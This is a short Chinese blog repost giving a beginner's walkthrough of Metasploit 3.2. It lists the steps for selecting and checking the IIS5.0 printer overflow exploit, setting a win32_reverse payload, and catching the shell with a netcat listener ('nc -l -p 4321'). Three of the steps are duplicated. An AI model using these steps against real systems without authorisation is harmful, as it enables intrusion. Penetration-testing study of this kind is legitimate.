Metasploit是一个漏洞开发和利用的平台,功能非常强大,在内网渗透和漏洞replay方面非常有用,其网站地址为http://www.metasploit.com/,最新版本为3.2,软件下载地址为http://spool.metasploit.com/releases/framework-3.2.exe,有关平台相关的paper可以到http://www.metasploit.com/research/conferences/进行下载。
原文见附件MetaSploit使用初步教程,其实很简单,主要有以下几步:
(1)安装Metasploit
(2)运行Metasploit
(3)执行show exploits
(4)选择相应的exploits
(5)查看exploits。例如info iis50_printer_overflow
(6)使用exploits,例如use iis50_printer_overflow
(7)设置需要溢出程序的参数,例如设置端口和IP地址等。
(8)检查看能否溢出服务器或者PC ,执行check命令
(9)查看选项,show options,show payloads
(10)查看溢出的一些选项,info win32_reverse
(11)设置溢出选项,set payload win32_reverse
(12)使用nc监听,以获取shell,nc -l -p 4321
(10)查看溢出的一些选项,info win32_reverse
(11)设置溢出选项,set payload win32_reverse
(12)使用nc监听,以获取shell,nc -l -p 4321
大致就这些吧,具体需要自己去体会。呵呵。
附件:http://down.51cto.com/data/2353722
本文转自 simeon2005 51CTO博客,原文链接:http://blog.51cto.com/simeon/192881